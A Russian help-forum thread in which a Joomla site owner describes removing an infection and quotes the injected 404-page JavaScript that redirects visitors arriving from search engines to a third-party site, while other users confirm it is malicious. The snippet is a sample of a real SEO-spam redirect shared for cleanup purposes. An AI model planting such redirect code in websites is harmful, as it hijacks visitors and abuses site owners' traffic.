Ответы (4)

Алексей Иванов +7
19.12.2016 11:51
Это явно вирусный файл. В стандартной сборке таких нет.
Свернуть ответы
Я тоже склоняюсь к этому, я его удалил. Сайт работает. До этого была проблема: был вирус редирект с 404 страницы на сторонний сайт. На странице 404 был прописан такой скрипт:
var s = document.referrer;
if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {
self.location = 'http://сайт куда переправляло/';
}
Я понял что эта фигня работала примерно так: генерируется куча страниц левых и получается что они 404 при переходе на страницу 404 перекидывает на левый сайт. Это если на сайте страница 404 отдает код 200 а не ошибку. Тогда это работает. Запутанная схема.
После этого я чистил сайт Айболитом все вычистил все норм, обновил все что можно сменил везде пароли, поставил защиту на админку и т.д. А этот закодированный фай айболит пропустил и вирусом его не считает. Наткнулся на него чисто случайно, попробовал раскодировать а там такая ерунда.
С уверенность могу сказать, что этим вирусом сейчас заражено очень много сайтов на Joomla, проверял просматривал.
К примеру вот http://sodeystvie-krim .ru. Перейдите на страницу 404 и в исходно коде будет прописан этот скрипт.
Но редирект не срабатывает так как страница 404 отдает ошибку. Если бы ответ был 200 то сработало бы.
Увидеть эту всю ерунду можно через Явебмастер будет много исключенных страниц.
Алексей Иванов +7
19.12.2016 13:55
Внедрение подобного скрипта очень популярная проблема сайтов на CMS Joomla. Особенно со старыми версиями и "бесплатными" компонентами.
Зачастую айболит, по крайней мере его коммерческая версия, не позволяет обнаружить уязвимость, через которую сайт был заражен. Для этого необходимо провести комплексный ряд мероприятий.
Лавр Иванов +120
19.12.2016 16:03
Явный вредоносный элемент.

Похожие вопросы

Виталий Лошков
137

Требуется помощь, консультация, настройка

При выполнении команды конвертации файла в odt из PHP-скрипта: system ("sudo -u root unoconv -f docx file.odt"); время от времени (может раз в день, может раз в неделю) команда перестает работать, при этом ответ от PHP-скрипта никакой не приходит. Лечится...
Andrey
191

Проблема с отправкой почтовой формы

Доброго времени суток. Столкнулся со следующей проблемой - есть небольшой лэндинг на html, в котором есть форма отправки данных на почту gmail.  Для отправки формы используется небольшой php код <?php     if ($_SERVER['REQUEST_METHOD']=='POST'...
С помощью соцсетей
У меня нет аккаунта Зарегистрироваться
Нажимая кнопку «Зарегистрироваться», я даю согласие на обработку своих персональных данных, указанных в форме регистрации.
С помощью соцсетей
У меня уже есть аккаунт Войти
Нажимая кнопку «Зарегистрироваться», я даю согласие на обработку своих персональных данных, указанных в форме регистрации.
Инструкции по восстановлению пароля высланы на Ваш адрес электронной почты.
Пожалуйста, укажите email вашего аккаунта
Ваш баланс 10 ТК
1 ТК = 1 ₽
О том, как заработать и потратить Таймкарму, читайте в этой статье
Чтобы потратить Таймкарму, зарегистрируйтесь на нашем сайте